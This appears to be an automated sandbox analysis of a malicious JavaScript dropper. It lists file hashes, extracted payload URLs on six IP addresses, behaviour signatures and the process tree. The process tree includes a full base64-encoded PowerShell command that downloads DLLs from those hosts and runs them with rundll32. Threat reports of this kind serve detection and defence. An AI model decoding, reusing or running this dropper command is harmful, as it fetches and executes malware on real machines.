2509f0df15b1caab70d2f0a55287a51419b158afbe4743e6a2de767af2af96d0

Analysis

max time kernel
31s
max time network
33s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
25/03/2023, 01:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3ea11f515eb42ed351b3e53855097b35dcf00a9faf9fd868299b71fb4e34847e.js
Size

76KB
MD5

bdbc96baa80959b9567644cfd9cfa108
SHA1

74454032b37ae698615dc3db4d7f4eb47a9aa596
SHA256

3ea11f515eb42ed351b3e53855097b35dcf00a9faf9fd868299b71fb4e34847e
SHA512

b6c876b7304b8467f46402e449b7951719844d73d18c9f5b06be279f4d26a7c2ff796dc5810158cf771badacf3a2b63689b626b3989604c422280bf718fdcfe4
SSDEEP

1536:+GEcysfmIvfU3FGXpF266XPOBgtEc5zOdqBHcnyFfIruavQGWMaMfqRwqwcIkisb:+QysfmIvfU3FGXpF266XPOBgtEc5zOde

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://103.214.71.131/gdg77dzSUN7N.dat

exe.dropper

http://198.44.140.75/ZDaZZLNJq.dat

exe.dropper

http://87.236.146.53/mSVe5fds.dat

exe.dropper

http://154.7.253.203/Vodubu.dat

exe.dropper

http://137.74.39.237/LM0g9Nw.dat

exe.dropper

http://139.180.172.203/ajyMC.dat

Signatures

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
896	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	896	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1308 wrote to memory of 896	1308	wscript.exe	28
PID 1308 wrote to memory of 896	1308	wscript.exe	28
PID 1308 wrote to memory of 896	1308	wscript.exe	28

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\3ea11f515eb42ed351b3e53855097b35dcf00a9faf9fd868299b71fb4e34847e.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1308
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQAUwB0AHIAbwBtAGEAdABvAGwAaQB0AGUATQBlAHQAYQBzAHQAZQByAG4AdQBtACAAPQAgACgAIgBoAHQAdABwADoALwAvADEAMAAzAC4AMgAxADQALgA3ADEALgAxADMAMQAvAGcAZABnADcANwBkAHoAUwBVAE4ANwBOAC4AZABhAHQALABoAHQAdABwADoALwAvADEAOQA4AC4ANAA0AC4AMQA0ADAALgA3ADUALwBaAEQAYQBaAFoATABOAEoAcQAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA4ADcALgAyADMANgAuADEANAA2AC4ANQAzAC8AbQBTAFYAZQA1AGYAZABzAC4AZABhAHQALABoAHQAdABwADoALwAvADEANQA0AC4ANwAuADIANQAzAC4AMgAwADMALwBWAG8AZAB1AGIAdQAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwAxADMANwAuADcANAAuADMAOQAuADIAMwA3AC8ATABNADAAZwA5AE4AdwAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwAxADMAOQAuADEAOAAwAC4AMQA3ADIALgAyADAAMwAvAGEAagB5AE0AQwAuAGQAYQB0ACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFUAbgBkAGUAbgBvAG0AaQBuAGEAdABpAG8AbgBhAGwAaQBzAG0AIABpAG4AIAAkAFMAdAByAG8AbQBhAHQAbwBsAGkAdABlAE0AZQB0AGEAcwB0AGUAcgBuAHUAbQApACAAewB0AHIAeQAgAHsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABVAG4AZABlAG4AbwBtAGkAbgBhAHQAaQBvAG4AYQBsAGkAcwBtACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA2ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABTAHUAdAB0AGkAbgBIAGEAcAB1AGsAdQAuAGQAbABsADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBUAEUATQBQAFwAUwB1AHQAdABpAG4ASABhAHAAdQBrAHUALgBkAGwAbAApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABTAHUAdAB0AGkAbgBIAGEAcAB1AGsAdQAuAGQAbABsACwARwBMADcAMAA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:896

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/896-60-0x0000000002950000-0x00000000029D0000-memory.dmp

Filesize
512KB

Download
memory/896-59-0x000000001B1B0000-0x000000001B492000-memory.dmp

Filesize
2.9MB

Download
memory/896-58-0x0000000002950000-0x00000000029D0000-memory.dmp

Filesize
512KB

Download
memory/896-61-0x0000000002420000-0x0000000002428000-memory.dmp

Filesize
32KB

Download
memory/896-62-0x0000000002950000-0x00000000029D0000-memory.dmp

Filesize
512KB

Download
memory/896-63-0x0000000002950000-0x00000000029D0000-memory.dmp

Filesize
512KB

Download
memory/896-64-0x0000000002950000-0x00000000029D0000-memory.dmp

Filesize
512KB

Download